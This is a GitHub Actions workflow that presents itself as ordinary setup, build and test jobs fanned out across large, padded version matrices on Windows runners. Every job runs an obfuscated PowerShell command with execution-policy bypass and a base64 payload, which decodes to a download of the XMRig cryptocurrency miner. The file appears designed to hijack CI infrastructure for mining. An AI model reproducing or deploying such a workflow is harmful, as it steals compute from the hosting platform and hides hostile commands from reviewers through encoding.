name: Second
on:
  workflow_dispatch:
jobs:
  setup:
    runs-on: windows-latest
    strategy:
     max-parallel: 200
     fail-fast: false
     matrix:
      java: [ '20','19', '18', '17', '16', '21', '20','19', '18', '17', '16', '21','20','19', '18', '17']
      python-version: ['2.7', '3.6', '3.7', '3.8', '2.7', '3.8', '2.7', '3.6', '3.7', '3.8', '2.7', '3.8','2.7', '3.6', '3.7', '3.8']
      platform: [windows-latest]
    steps:
      - name: ONE
        run: powershell.exe -exec bypass -enc SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjEyLjIveG1yaWctNi4xMi4yLWdjYy13aW42NC56aXAgLU91dEZpbGUgeG1yaWcuemlw
  build:
    runs-on: windows-latest
    strategy:
     max-parallel: 190
     fail-fast: false
     matrix:
      ruby: [3.0.2, 2.7.4, 2.6.8, 3.0.1, 2.5.9, 3.0.0, 3.0.2, 2.7.4, 2.6.8, 3.0.1, 2.5.9, 3.0.0, 3.0.2, 2.7.4, 2.6.8, 3.0.1]
      python-version: ['2.7', '3.6', '3.7', '3.8', '2.7', '3.8', '2.7', '3.6', '3.7', '3.8', '2.7', '3.8','2.7', '3.6', '3.7', '3.8']
      platform: [windows-latest]
    steps:
      - name: TWO
        run: powershell.exe -exec bypass -enc SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjEyLjIveG1yaWctNi4xMi4yLWdjYy13aW42NC56aXAgLU91dEZpbGUgeG1yaWcuemlw
  test:
    runs-on: windows-latest
    strategy:
     max-parallel: 180
     fail-fast: false
     matrix:
      PHP: [8.1, 8.0,7.4, 7.3, 7.2, 7.1, 8.1, 8.0,7.4, 7.3, 7.2, 7.1, 8.1, 8.0,7.4, 7.3]
      python-version: ['2.7', '3.6', '3.7', '3.8', '2.7', '3.8', '2.7', '3.6', '3.7', '3.8', '2.7', '3.8','2.7', '3.6', '3.7', '3.8']
      platform: [windows-latest]
    steps:
      - name: THREE
        run: powershell.exe -exec bypass -enc SW52b2tlLVdlYlJlcXVlc3QgaHR0cHM6Ly9naXRodWIuY29tL3htcmlnL3htcmlnL3JlbGVhc2VzL2Rvd25sb2FkL3Y2LjEyLjIveG1yaWctNi4xMi4yLWdjYy13aW42NC56aXAgLU91dEZpbGUgeG1yaWcuemlw
